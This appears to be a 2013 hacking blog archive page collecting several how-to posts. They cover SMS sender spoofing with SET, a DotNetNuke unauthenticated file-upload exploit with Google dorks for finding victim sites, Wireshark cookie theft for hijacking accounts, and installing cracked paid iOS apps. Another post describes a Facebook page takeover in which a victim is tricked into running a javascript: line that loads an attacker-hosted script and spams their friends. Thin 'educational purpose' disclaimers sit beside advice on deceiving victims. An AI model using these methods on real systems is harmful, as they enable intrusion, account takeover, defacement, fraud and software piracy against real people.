Archive for July 2013

Bhag Milkha Bhag Full Movie Watch Online

By : Unknown
Directed byRakeysh Omprakash Mehra
Produced byRakeysh Omprakash Mehra
Viacom 18
Written byPrasoon Joshi
Based onMilkha Singh
StarringFarhan Akhtar
Sonam Kapoor
Music byShankar-Ehsaan-Loy
Distributed byViacom 18
Release date(s)
  • 12 July 2013
CountryIndia
LanguageHindi

Bhag Milkha Bhag Full Movie Watch Online 

Click Here 


SMS Spoofing With BackTrack

By : Unknown
As the name suggest SMS spoofing is the art of sending text messages from the number you wish to anybody you want. I urge all of you to use this information for educational purpose only. To carry this you need some basic knowledge of backtrack operating system. EnjoY..!!!

What is SMS Spoofing?

  As i mentioned earlier, SMS sppofing is the art of forging someone's mobile number to send text messages. According to Wikipedia SMS spoofing means to set who the message appears to come from by replacing the originating mobile number (Sender ID) with alphanumeric text/ another number.


Main Requirments:

Backtrack 5 with SET, Download Backtrack here



Tutorial:

1.Install Backtrack and Open Following Option as shown in figure.

 Now Go to "Applications" > "Backtrack" > "Exploitation Tools" > "Social Engineering Tools" > "SET"(You can terminal as well "cd /Pentest/exploits/SET")
Now press 1 and hit Enter to perform "Social Engineering Attacks" 
Now press 7 and hit enter to carry SMS Spoofing attack
fter, Press 1 to perform SMS spoofing on a single number, If you want perform in mass and then you can press 2 and hit Enter.
 Now enter the number of the receiver after that it ask you to chose template, choose 1. Pre-Defined Template, List of pre-defined templates will appear, choose what you want.Now pretty much done,If you have android emulator, then that is well and good. You can also use paid services.

DNN Hacking Tutorial

By : Unknown



Portal hacking
This BUG Find by Iranian Researchers
DNN(DotNetNuke) Gallery All Version Remote File Upload without Authentication
Bug Found by Alireza Afzali From ISCN Team
Date of finding bug : 2008/05/5
Over 10 military website and 20 state of United State of america Defaced by this bug Tongue
Find DNN path then go to this file
----------------------------------------------------------------------------------------
Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Select : File ( A File On Your Site )
after Loading then Put this Code instead URL
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')

now you see Browse
select root folder and your file will upload to
site/dnn path/Portals/0

Code:
Note:you can only upload *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp, *.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
by defualt but admin may change this and you will have a Shell

Here is the way of hacking site by portal.....
Step 1 :
Code:
Google
Step 2:- Now enter this
Code:
inurl:/tabid/36/language/en-US/Default.aspx
Code:
inurl:"portals/0/"
this is a dork to find the Portal Vulnerable sites, use it wisely
Step 3:- U will find many sites, Select the site which you are comfortable with.
Step 4:- For example take this site.
Step 5:- Now replace
Code:
/Home/tabid/36/Language/en-US/Default.aspx
with this
Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Step 6:- You will get a Link Gallary page.So far so good!
Step 7:- Dont do anything for now, FINAL stage APPROACHING.
Step 8:-Now replace the URL in the address bar with a Simple Script
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
Step 9:-You will Find the Browse and Upload Option
Step 10:-Upload your package

Congrats You just hacked a site.. =))

Session Hijacking Tutorial [cookie stealing]

By : Unknown
First of all, before going any further you have to understand what a cookie is. So what is a cookie? a cookie is a small piece of information that is stored in the user's client (browser) when a user visits a website. It is generated by the web server and sent to the browser for authentication purpose.  Lets say you login to your facebook account, when you login a session data is being created in the facebook's server and it sends a cookie file to your browser. when you do some activity in facebook, these two things are compared and matched everytime. So if we manage to steal this cookie file from someone we will access to their account. In this tutorial i will show you how to do this in LAN. (this method will not work if the victim is not connected to your network.)


So in this tutorial you will be using a tool called Wire Shark ( Download From Here ) and a firefox add on called Add N Edit Cookies. (Download From Here ).

When done this process, just minimize Cain And Abel.

Wire shark is a tool used to sniff packets from the network clients. we will be using this to steal our cookies.
Add N Edit Cookies add on is to inject the stolen cookie into firefox browser.

Download and install wireshark, open it up and click on "Capture" from menu bar. select your interface and click Start. this will start to capture all the packets from your network.

Now find the packets using ther filterer http.cookie.
Look for packets which has POST and GET in it. this is the http information sent to server.


Now once you found the cookie, copy its value like this:

Paste it and save it in a notepad file. Now the final thing to do is, open firefox and start the Add N Edit Cookies Add on from tools menu. Now Insert the stolen cookie here, and you're done! you should be having access to the victim's account now!

Install Cracked Apps Without Jailbreak

By : Unknown

1) Download the software called Kuaiyong.

2) Launch the setup of Kuaiyong, and install it (simple setup)

3) After Installing the Software, plug-in your iDevice with USB Cable.


4) Now Launch Kuaiyong application from Desktop, it will look like below:


5) It will show a list of Apps and Games (Paid), you can search using the Search Bar or you can select an app from the list.    

 a) Search Bar   

 b) List navigation        

                                           

6) After choosing an App or Game to download, Click on it then Click the Red button like below.


7) It will starts downloading the app. Just wait until it completes Downloading.



8) After it downloads the Paid app wait some time to Sync the App and add it to your iPhone, iPad or iPod...

Facebook Fan Page Hacking

By : Unknown

Today in this article I am going to explain you how to hack Facebook fan page using javascript. As we all know its difficult to hack Facebook fan page but using this method you can hack Facebook fan page easily...


Tutorial:


Now lets start the tutorial of facebook fan page hacking . First of all we will need to setup an exploit and a website to host that exploit. If you already have a registed hosting account then its great otherwise there are couple of free hosting websites that can be used for such purposes like 000webhost.com etc.

Step 1: First download Facebook page hacking exploit,

CLICK TO DOWNLOAD  Facebook page hacking exploit


Step 2: Now open the pagehack.js [in package] with notepad and search for hackerspositive@gmail.com and change hackerspositive@gmail.com with ur facebook email.

Step 3: Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text <b>Hey See what i got!</b> and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is anautoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15.
Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js) and then save it.

Step 4: Now create a account on free hosting like 0fess.net or 000webhost.com ( 110mb.com won't help this time so do not use it H+ fanz) and upload facebook page hacking exploit on your free hosting website. you will get url address something like this

www.yoursite.com/pagehack.js

Step 5: Now ask victim to paste this in browser address bar, He must be admin of page.Which you wants to hack:

javascript:(a = (b = document).createElement("script")).src = "http://www.yourwbesite.com/pagehack.js", b.body.appendChild(a); void(0)

Note : Change http://www.yourwbesite.com/pagehack.js in javascript with ur own address and name u make of your file.
NOTE2: Now a days latest browser did not support it so according to me ask victim to save it as bookmark and then click that bookmark then it will run successfully.


Tip: Tell him that it will make your page safe, or something else like attracting. Encode this javascript into ascii format for more results.

 When he will put this key in address bar and that's it you will get a notification that you are admin of his page now.

 Enjoy..!!!

 But don't hack for bad cause, I will not be responsible for any consequences made by you. For education purpose only.!

Most Important Addons for Hackers & Pentesters

By : Unknown
There are many types of Addons & there is also many Hacking, Pentesting ad-dons specially for Security researchers. So today i created this Post to give you little info about important addons for hackers & pentesters. 





 Most Important Addons for Hackers & Pentesters : 

*First of all always use Mozilla Firefox for Web App Pentesting & to use all these addons.

[1] Tamper Data

Tamper Data is one of the most useful Addons for Pentesters it is used to view and modify HTTP/HTTPS headers and post parameters.Trace and time HTTP response or requests. Security test web applications by modifying POST parameters and Much More.

[2] Hack Bar

Hack Bar is one of the Best & Most wanted Simple security audit / Penetration test tool. Very Strongly Recommended you to Install & very useful. Useful in XSS, SQL Encoding/Decoding - MD5, SH1, Base64, Hexing, Splitting etc.
[3] Live HTTP Headers
Live HTTP Headers is little bit same as Tamper Data but with great difference and art of working & Viewing HTTP headers of a page while browsing. It most comes use to Inject XSS Payloads & get many information of website plugins,CSS,Javascript & HTML content.

[4] User Agent Switcher

The User Agent Switcher extension adds a menu and a toolbar button to switch the user agent of a browser. It can help you changing the User Agent to IE, Search Robots, I-Phone (I-OS), or you can also create your own User Agent. we've also Posted How to discover XSS through HTTP Header Injection & there we used User Agent Swithcer.
[5] Cookie Manager+
Cookies manager to view, edit and create, Inject Cookies etc. It also shows extra information about cookies, allows edit multiple cookies at once & backup/restore.

Locked Share Post

By : Unknown



Tag : ,

How To Approved Google Adsense Account

By : Nitin Bagoriya ( Nitzz )
<>--------<><>--------<><>--------<><>--------<><>--------<><>--------<><>--------<><>--------<>

          You Just have to follow the Given Instructions:-   :)

<>--------<><>--------<><>--------<><>--------<><>--------<><>--------<><>--------<><>--------<>





  • First you have to make a new Gmail Account. 
  • Now sign up for Youtube with that new Gmail account.
  • After Signing up you have to open  www.youtube.com/account
  • Then You Have to Access Monetising Page in Your account Setting
  • When you Click On Adsense Associated Page You Will Be Redirected to this page ==>>      www.youtube.com/account_monetization?action_adsense_connection=1 
  • Then Select the option which is located  at the bottom of the page to choose the Google Account
  • Then  enter the password of your Google Account
  • Confirm the association and provide your billing information then Click On submit
  • After That you will  be redirected back to your YouTube account 
  • Congratulation ! You are all done. Just wait for the mail.

  • - Copyright © Computer Cracker - Date A Live - Powered by Blogger - Designed by Johanes Djogan -